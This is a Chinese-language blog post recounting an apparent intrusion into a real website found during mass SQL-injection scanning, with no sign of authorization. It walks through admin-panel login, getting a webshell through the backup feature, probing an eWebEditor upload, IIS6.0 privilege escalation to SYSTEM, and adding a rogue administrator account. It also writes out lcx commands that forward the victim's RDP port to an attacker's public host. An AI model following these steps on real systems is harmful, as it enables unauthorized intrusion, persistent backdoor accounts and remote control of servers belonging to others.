記一次滲透提權03伺服器

站點是批量測注入的時候發現的，隨手測了下後臺就是admin，登陸進去發現有兩處應該可以拿shell

備份檔案

備份功能穩不穩定不知道，怕把站點搞死，最後還是通過備份成功getshell的 XD

圖片上傳

測試了修改檔案型別，00截斷，.asa、.cer….等無效，而且上傳的檔名自動轉換時間戳重新命名，遂放棄。

不過有意思的是，右鍵原始碼把編輯器揪出來了，開發把編輯器隱藏顯示了，如下圖（display:none改成on後即可顯示，然鵝沒有卵用，並不正常顯示）

知道是eWebEditor的編輯器，編輯器後臺地址：http:127.0.0.1/pluck%60edit/admin/login.asp，嘗試了爆破，弱口令，預設備份mdb下載均無果也放棄了。（後來進去翻到賬號就是建站公司的英文名字，密碼加了個三位數，資訊蒐集對於爆破這一塊還挺重要的）

提權

許可權提升

進去大馬（站點僅支援asp），可以直接執行cmd，就是許可權很低

systeminfo直接看打了什麼補丁，拿exp先懟懟看，複製下來補丁資訊，扔進去 提權輔助 這個網頁裡比較下，可以使用 IIS6.0 的一個 exp，傳到可讀寫目錄裡，我這裡就是 C:\wmpub ，然後就用 IIS6.0.exe 執行命令，發現是system許可權了，同樣的方法新增一個管理員帳號。

遠端連線

由於主機在內網，開放的就是3389埠，我們只需要將主機的3389埠轉發出來，就可以連線上去

埠轉發工具：lcx （具體使用方法移步： 傳送門 ）

公網主機：

lcx -listen 2222 6666

肉雞：

lcx.exe -slave 公網主機ip 2222 127.0.0.1 3389

然後公網主機連線127.0.0.1:6666，發現連線失敗，我丟。。。。（quser查詢有一個前幾天線上的管理，logoff踢掉了，然鵝還是上不去）

就到這裡吧。